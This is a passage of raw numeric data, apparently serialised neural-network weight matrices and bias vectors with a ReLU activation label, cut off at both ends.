-0.09717], [0.9336, 0.2036, 0.1661, -0.001522, -0.2095], [-0.0408, 0.549, 0.0575, 0.143, 0.09485], [-0.2123, -0.3281, 0.3574, -0.3896, -0.4592], [0.032, 0.4224, -0.569, -0.2108, 0.07574], [-0.012405, 2.285, 0.05347, 0.05804, 0.11865], [-0.12244, -0.712, 0.009155, -0.391, 0.034], [0.06018, -0.0639, -2.502, 0.04996, -0.03778], [0.0833, -0.04074, -0.752, -0.1188, -0.218], [-1.188, 0.1447, -0.1493, -0.03607, -0.11896], [-0.1035, 0.07, 2.424, 0.02264, 0.03195], [-0.0854, 0.1752, -0.0874, -0.732, -0.2208], [-0.01938, 3.994, 0.1178, 0.0784, -0.01452], [0.0167, -0.6543, 0.56, 0.1965, -0.4497], [0.001677, 0.005383, -0.007267, 0.00418, 0.001781], [-0.8975, -0.1276, 0.1628, -0.04813, 0.07855], 
[-0.933, -0.02432, 0.2302, -0.209, -0.09436], [0.1603, 0.003693, 0.2622, 0.282, -0.5513], [0.0834, 2.014, 0.3552, 0.036, -0.0997], [0.284, -0.04657, 0.00748, -0.8403, -0.4817], [1.373, 0.005882, 0.01309, -0.0741, -0.1559], [-0.1444, 0.0006075, -0.02116, -0.648, -0.01826], [-1.363, -0.02072, 0.04456, 0.0394, 0.09357], [-1.552, 0.0838, -0.03522, 0.006058, 0.008286], [1.297, 0.0938, 0.1754, 0.1334, 0.2988], [0.01587, 0.3298, -0.2654, -0.1035, 0.0766], [-0.0416, -1.477, -0.05792, -0.2067, 0.2015], [-0.0827, 0.002552, 0.00987, 0.069, -0.879], [-1.59, 0.04758, 0.00763, -0.01426, 0.00285], [0.02834, -0.02309, -0.07635, -0.7715, 0.499], [0.1392, -0.5723, 0.4268, -0.33, 0.2808], [0.2578, -0.0627, -0.331, 0.3298, -0.8564], [0.06866, 0.002459, -0.01426, 0.02798, -1.851], [-0.7446, 0.003119, -0.1879, 0.01362, -0.01596], [-0.4165, 0.01207, -0.04816, -0.3645, 0.288], [-0.6323, -0.03586, 0.02835, 0.0738, 0.065], [0.0392, 0.5645, 0.263, -0.01396, -0.358], [-0.03857, -0.1239, -0.7627, 0.0423, 0.0499], [-1.576, 0.0004401, -0.00832, -0.09265, -0.004936], [0.6206, 0.075, -0.01461, 0.2627, -0.258]]
[0.22763, -0.188762, 0.0534094, -0.377861, -0.0812531, -0.588651, 0.0746065, -0.392887, -0.356303, -0.167712, 0.0587109, 0.183917, 0.131957, -0.308681, 0.196929, 0.206664, -0.311696, 0.0306576, -0.138822, -0.347434, -0.0045184, -0.390616, 0.0969635, 0.00983266, -0.0188585, -0.231919, -0.238165, 0.0710148, -0.141913, -0.442307, 0.559084, 0.135483, -0.373217, -0.41539, 0.759638, 0.132825, 0.235566, 0.214858, -0.440841, -0.0772968, 0.221606, -0.00650873, -0.634843, -0.153833, -0.0573027, -0.109229, 0.0370344, 0.0538087, -0.44755, 0.175917, 0.2277, -0.1887, 0.0534, -0.378, -0.08124, -0.589, 0.0746, -0.3928, -0.3562, -0.1677, 0.05872, 0.184, 0.132, -0.3086, 0.1969, 0.2067, -0.3118, 0.03065, -0.1388, -0.3474, -0.004517, -0.3906, 0.097, 0.009834, -0.01886, -0.2319, -0.2382, 0.07104, -0.142, -0.4424, 0.559, 0.1355, -0.3733, -0.4153, 0.76, 0.1328, 0.2356, 0.2148, -0.441, -0.0773, 0.2216, -0.006508, -0.635, -0.1538, -0.0573, -0.10925, 0.03705, 0.0538, -0.4475, 0.1759]
ReLU
[[-0.184202, 0.0343834, -0.115142, 0.184753, -0.137148, -0.189317, -0.748695, 0.575849, -0.0133157, 0.143641, 0.133067, -0.224418, 0.302148, 0.0408489, -0.339559, 0.064917, 0.0731692, -0.459231, 0.474744, 0.377226, -1.11407, -0.571853, 0.0499151, -0.254206, -0.025244, 0.225768, 0.149962, -0.155202, -0.0172013, 0.990686, 0.0783843, -0.144198, -0.179075, -0.340037, 0.212321, 0.00825806, 0.0684292, 0.587946, -0.170712, -0.54369, 0.118932, -0.495853, -1.66652, -0.324074, -0.0154229, 0.5101, 0.0940898, 0.337388, 0.395671, -0.223473, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0171639, -0.0344739, -0.00869311, 0.0381665, 0.021407, 0.0421881, 0.0215526, -0.033617, -0.0474388, 0.0213502, 0.00994309, 0.0277698, 0.00492707, -0.0427201, -0.0240032, -0.0322351, 0.0133943, -0.0423694, -0.0401146, -0.0174541, -0.0423118, 0.0146571, -0.0313675, 0.0384782, 0.0464228, 0.0218262, 0.0159546, 0.00417461, 0.0174008, -0.0178484, -0.0479125, -0.00408486, -0.041842, 0.0014546, -0.0508771, -0.046335, 0.0214261, -0.0532753, -0.0573137, 0.0289767, -0.032939, -0.031973, -0.0333988, -0.0227086, -0.0154722, -0.0484061, -0.0071155, -0.0371157, 0.0196442, -0.0351744, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0698282, -0.00408911, -0.277997, 0.25879, 0.15582, -1.33151, -1.31188, -0.893189, 0.195445, 0.384027, 0.0427115, -0.539398, 0.0812943, 0.401288, -0.274514, 0.367932, -0.760605, -1.29349, 1.4711, 0.0977806, -0.790099, -0.534664, 0.00720768, -0.553668, -0.0219908, 0.265326, 0.203953, 0.409155, -0.859508, 0.187561, 0.242437, -0.112824, 0.526523, -0.463904, -0.364338, 0.0536935, 
0.443625, 0.919664, 0.639951, -0.878768, -0.978508, -0.0391997, 0.142149, -0.798507, -1.76701, 0.152952, 0.26103, -1.87652, -0.592208, 0.440622, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.794837, -0.36298, -0.171911, 0.0975946, 0.0271402, -0.415327, -0.0924507, -0.602603, -0.320925, 0.43533, 0.52763, -0.415412, -0.195773, -0.0372765, -1.00783, 0.133426, 0.248356, -1.69865, 2.01099, -0.707126, 1.15497, 0.527052, -0.169422, 0.363558, -0.0301804, 0.770538, -0.377548, -0.0137244, -0.487739, 0.22633, 0.383543, 0.2819, -0.476764, 0.00903008, -0.101426, -0.620982, 0.00445635, -0.144175, -0.132467, 0.356608, 0.0580446, -0.455311, -0.707104, -0.405381, -0.0423059, 0.596877, -0.217635, -0.128899, -0.126611, -0.172846, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0585128, 0.00708394, 0.268116, -0.00659521, 0.315806, -0.053758, 0.365686, 0.0360562, -0.047443, -0.371296, 0.153974, -0.215701, 0.14624, 0.414588, -0.0522092, -0.122101, -0.238432, -1.09953, -3.20509, -0.438948, -0.260557, -0.269236, -0.0409149, 0.369151, -0.0435317, -0.344475, -0.370995, -0.368811, -0.0348575, 0.383794, -0.104012, -0.345975, 0.525536, 0.140227, 0.15607, 0.573022, -0.016426, -0.134221, -0.133525, 0.00989791, -0.21803, -0.156527, -0.639669, 0.667558, 0.414996, 0.324016, -0.0659676, 0.859081, -0.619551, -0.011175, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0332535, -0.081036, 
-0.53441, 0.667956, -0.81253, 1.29677, 1.2687, 0.704389, 0.11782, 0.0314183, 0.345893, -1.27676, 0.259326, 0.755813, 0.558989, -0.12361, -0.316966, -1.38929, -2.33073, 0.684739, 0.0419089, -0.641408, -0.0220248, -0.815136, 0.0362659, -0.332806, -0.174175, -0.664114, 0.215466, 0.414545, -0.316214, 0.41088, 0.656423, 1.71721, -0.35039, 0.074316, 0.374249, 0.239212, 1.45042, -0.321268, 0.245178, -0.717588, -1.7871, 1.14188, 0.282764, 0.794952, -0.299762, -0.773011, -0.0411885, 0.819762, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.2083, 0.835133, -0.151215, 1.15162, 0.221574, 0.108233, 0.065131, 0.145465, 0.63193, 0.108889, 0.508279, -0.269129, -0.198187, 0.172319, 0.325839, 0.0612855, -0.635311, -0.435558, 0.590671, 0.0923703, -0.009911, -0.227569, -0.39122, 0.0431908, -0.0457549, 0.200247, 0.127429, -0.326969, 0.594883, -0.412727, 0.178482, 0.00578636, -0.661192, 0.0103202, -0.110329, 0.54206, 0.158893, 0.466656, -0.270218, -0.22388, -0.0313375, -0.238189, -0.399878, 0.728962, 0.109875, -0.51882, 0.28044, 0.365676, 1.3629, -0.138101, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.10533, 0.278798, -1.34995, -0.0696007, 0.754957, 2.57716, 0.0865201, 0.511288, -0.0577744, -0.10405, -0.423933, -0.213807, 0.0263156, 3.1673, 0.705454, 0.156442, 0.115742, 0.889692, 0.0485605, -0.329414, -7.39524, -0.587756, 0.679489, 0.404011, 0.0353466, -1.80159, -0.395659, 0.197522, -0.288667, -0.830536, 0.318075, -0.818103, -0.743075, 0.368427, 0.023399, 0.407831, -1.04199, 0.483819, 0.0828921, 0.35722, -1.50174, -0.196254, 0.725435, 0.222741, 0.0339974, -0.583928, 0.0931427, 
0.328158, 0.823124, 0.0510477, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0180697, -0.120998, -0.193342, 0.85779, -1.75996, -0.145697, 2.56764, 0.782773, 0.450378, -0.0982587, -0.1247, -0.72638, -0.732309, 0.153515, -0.0326798, 0.0859862, -0.569807, 0.394019, 0.117462, 0.251221, 0.845853, 0.847721, 0.421144, 0.573381, 0.025097, -0.17079, -0.127728, 0.00831425, 0.0787938, 2.577, -1.29938, 0.691162, -3.32454, -1.35713, -2.20211, 0.392762, 0.373119, 0.280267, -0.610076, 0.103084, -0.277629, 1.42858, 0.473211, -0.673607, 1.21082, -1.35457, 0.101984, -1.70226, 1.08811, -0.812626, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.234612, -0.00865116, 0.0404159, 0.25135, 0.655618, -0.187835, -0.628119, 0.518079, -0.39667, -0.78942, 0.175555, -0.392038, 0.277756, -1.05727, 0.526056, 0.510797, -0.106047, -1.67583, 1.80736, -0.23395, 0.701526, -0.541358, 0.105999, -0.167828, -0.029229, 1.14975, -0.15965, -0.227614, -0.135554, 1.56454, 0.780779, -0.724606, -0.593993, -0.998891, 0.0919827, 0.450594, -0.538901, 0.547649, -0.313118, -0.104741, 0.410557, 0.751659, 0.494966, -0.858162, -0.238985, -0.239199, 0.423537, -0.273949, 0.223215, -0.129985, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00582788, 0.0164447, -0.0498632, -0.0581705, 0.0244792, 0.0157947, -0.035586, 0.00395222, -0.0216416, 0.0112976, 0.0100584, -0.0641057, 0.0240168, 0.00582842, -0.0351634, 
0.0137765, -0.042078, -0.0348972, -0.0375012, -0.0257387, -0.0546805, -0.0358484, 0.00208489, -0.0363354, 0.0247895, 0.0334971, 0.0216527, 0.0198412, -0.0471676, -0.0070608, -0.00930937, -0.0494431, -0.0618612, 0.0300086, -0.0300961, 0.0139052, -0.0482571, -0.00451284, -0.0189375, 0.040227, 0.018182, 0.0375883, -0.0270563, 0.0337168, -0.0198271, -0.0165858, 0.0209145, -0.0422434, -0.0260662, -0.024986, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.280057, 0.377801, -0.441952, -1.27845, -0.298068, 1.28171, -0.54256, -0.346468, 0.275764, 0.525215, -0.295772, -0.582597, 0.166079, 0.162596, 0.390477, 0.161276, 0.0451447, -0.126315, -1.20241, 0.563122, 0.410249, -1.77284, -0.219624, -0.124339, 0.00454759, 0.100602, -0.52095, 0.0338173, -0.29227, 0.167408, -0.339629, 0.423217, 1.01269, 0.783648, -0.331597, -0.63313, 0.0739286, 0.952432, 0.24188, -0.277457, 0.453979, -0.0781443, 0.49036, -0.146128, -0.836312, -0.799947, -0.0445305, -0.0592702, -0.523676, 0.513579, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.108762, -0.024273, 0.439208, 0.650574, 0.196522, -0.838404, 0.121426, 1.17039, 0.232818, 0.304609, -0.535919, -1.06514, 0.869641, 0.496056, 0.154152, 0.0577726, 0.088973, 0.488296, -0.707301, -0.0893437, -4.56395, 0.174036, -0.211087, -0.479564, -0.0084636, 1.23712, 0.29091, 0.0513551, 0.397437, 0.263076, -0.862292, -0.06082, 0.580493, 0.320663, -0.783696, 0.366165, -0.0244925, -0.0981926, 0.57451, -0.5968, 0.589238, -0.704496, -0.560862, -0.0839649, 0.0147986, 0.143185, -0.112592, 0.11569, 0.0241843, 0.00782381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0876624, 0.600703, -0.393411, 1.05088, 0.260039, -0.138641, 0.319135, -0.597047, -0.705588, 0.61651, -4.616, 0.272411, 0.43197, -0.157418, -0.328696, 0.519095, -0.874161, -0.095202, 1.0002, -0.296085, -0.176376, -0.244104, 0.401531, -0.950305, 0.0173988, -1.43802, 1.33824, 0.15364, -0.457963, 0.947199, -1.31592, 0.279487, -0.773742, 0.822072, -1.33803, -0.567244, 0.453384, 0.250774, 0.429138, 0.223368, 1.01085, -0.984222, 0.231651, 0.17955, -0.307755, 0.497636, 0.384138, -0.142933, -0.480406, -1.6058, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.262059, 0.661248, -0.425415, 0.988594, -0.263324, -0.0854719, 0.727248, 0.0519006, -0.041103, 1.03413, 2.94721, -0.602879, 0.664402, 1.78682, -1.78073, 0.442521, -0.194133, 0.621769, 0.388468, -0.0222371, 0.0464028, 0.726418, 0.431174, -1.12577, -0.016403, -0.431634, -0.713739, 0.768949, -0.180023, 2.37554, -1.70709, 0.466608, 0.957275, 1.54362, -1.45329, -0.721497, 0.316534, -0.604271, 1.53063, -0.503255, -0.104254, 0.715042, 0.491117, 0.0150418, 0.152789, 0.163822, 0.665924, -1.19095, -0.536305, -0.65288, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.667995, -0.0202133, -0.43026, -0.598796, 0.353495, -0.464602, -0.12008, -0.0441756, 0.161297, 1.19578, 0.163675, 0.239733, 0.460481, 1.54292, 0.590185, 0.55305, 0.0333647, 1.09549, -0.182515, 0.173915, -2.19077, 0.226521, 0.262419, 0.995612, 0.04174, 
0.525167, -0.44444, -0.292628, -0.197206, -0.460871, -0.452132, -0.261302, 0.226308, -0.247908, -0.158471, 0.386675, -1.02155, 0.247639, 0.261188, 0.26775, -0.367003, -0.302024, -1.06073, 0.255533, 0.147995, -0.0131401, 0.216371, 0.66427, 0.647565, -0.0201, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.522074, -0.392761, 0.290612, -0.102772, 0.71297, -2.28415, 1.42424, 0.441092, 0.297105, -0.119794, -0.675246, 0.132939, 0.143614, -0.00590757, 0.319779, 0.628752, 0.504229, 0.807083, -1.6953, -2.90579, 0.0504308, 0.66254, -0.822735, 0.309652, 0.0441201, 0.703183, 0.173302, -0.0732583, 1.27966, 0.157619, 0.00391756, 0.242925, -0.164199, -1.02042, -0.0541494, -2.3978, 0.0937846, -0.275557, -0.488527, 1.01718, -0.322546, -0.431858, -0.544703, -1.18591, -0.646282, -0.35296, 1.00002, 0.702456, 0.410456, 0.0614669, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.295839, 0.48749, -0.250767, -0.797391, -0.232384, 0.418462, 0.387235, 0.960061, -0.191897, 1.04525, -0.651756, -0.279784, 0.716194, 0.342236, 0.829823, 0.148468, -0.113137, -0.446995, -0.301331, 0.113571, -0.0545101, -0.26255, -1.23184, 0.184642, -0.0426401, 1.19245, -0.433336, 0.0757407, 0.665245, -0.397853, 0.237394, -0.469161, -0.626106, 0.141971, -0.167829, 0.275424, -0.758347, 0.509359, -0.218216, -0.662873, -0.0595916, -0.0270402, 0.524964, -0.2321, -0.000389608, 0.135245, -0.461896, 0.998813, -0.303257, 0.0264833, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0597724, -0.18151, 0.234351, 1.16461, 0.0971876, 0.214008, 0.209933, 0.32958, -0.668421, 0.293814, -0.988543, -0.289137, 0.152218, -0.327873, -1.00006, 0.00650972, 0.541077, 0.409312, -1.00315, -0.668993, -0.0659849, 0.314336, -0.355661, -0.0508591, 0.0379435, 0.500943, -0.110721, 0.474046, 0.144216, -0.687312, -0.477, 0.435318, 0.571804, 1.82638, -0.929956, -0.118372, -0.349745, 0.194177, 1.54933, 0.0245301, -0.184153, 0.293282, -0.097109, -0.0632774, 0.22744, 0.872606, -0.601146, -0.985058, -0.616452, -0.730357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.225581, -0.13455, 2.60395, -0.27982, -0.0326815, 2.94465, -0.379955, 1.06743, 0.257016, -0.246081, 0.00626051, 1.00429, 0.444224, 1.98882, 0.456873, 0.101207, 0.291307, 0.482486, 0.0628707, -0.634902, -0.857219, 0.034626, -0.656198, -0.154894, 0.0263009, -0.083885, 0.312576, -0.403916, 0.192752, 1.17637, -0.446298, 1.14046, -0.422477, 0.441757, -0.175056, 0.237513, 0.362371, -1.0839, 0.791569, -0.288636, 0.15232, 0.16571, -5.58503, -0.292178, -0.609799, 0.00359772, 0.059814, 0.337497, -0.0456116, -0.0515602, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0766084, 0.120952, 0.159317, -0.376492, -0.0740785, -0.827363, -0.577585, -0.341195, 0.202595, 0.209397, 0.0713967, 0.221236, 0.267677, -0.277037, -0.0728074, -0.121906, 0.380108, 0.687495, -0.85154, 0.148517, 0.243052, -0.186309, -0.268694, 0.137717, -0.0112855, -0.291454, -0.0438027, -0.138478, 0.347759, 0.00719136, -0.342292, -0.678048, -0.810642, 0.224682, 0.28376, 0.240818, 0.368557, 
0.166734, -0.584406, -0.118577, -0.550049, 0.213712, 0.406012, 0.633921, 0.0375635, -0.214717, -0.448754, 0.853068, 0.368057, -0.234969, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0053438, -0.00537545, -0.184408, -0.142157, -0.416168, 0.363014, 0.345105, 0.296037, -0.124654, 0.322052, -0.235292, -0.0980614, 0.409397, -0.0497859, -0.375388, -0.250969, -0.0981585, 0.0722905, 0.540131, 0.266987, 0.31857, 0.389736, -0.00587657, -0.537369, 0.0225036, 0.145929, 0.456102, 0.435384, -0.420618, -0.904436, -0.137007, -0.532021, 0.0903367, -0.104481, 0.0678861, -0.0540483, -0.540282, 0.518167, -0.00479564, -0.0079926, 0.467129, 0.00156733, 0.349694, -0.180226, -0.296438, -0.424088, 0.635508, -0.604676, 0.209662, -0.30263, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.316588, 0.941569, 0.342191, -0.728312, 1.44769, 1.59755, 0.378296, -2.48756, 1.75363, 1.64103, 0.651603, 0.895939, 1.0602, 0.332887, -0.38988, -1.51751, 0.195401, 0.0682005, 0.572131, 0.35714, -0.176745, -0.0618688, -0.512659, -1.00565, -0.0173481, 0.793942, 1.57766, 0.70586, -1.05442, 1.96552, 0.0225863, 0.306499, -0.389977, 0.0613327, -0.123246, 0.201544, -0.514118, 0.357744, -1.03978, -2.52856, -0.826274, -0.196177, 1.85538, 0.243761, -0.836826, -1.63097, 0.52689, -1.88275, 0.966183, -0.630417, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.317647, -0.319918, -0.711323, 1.59191, 0.0841627, 
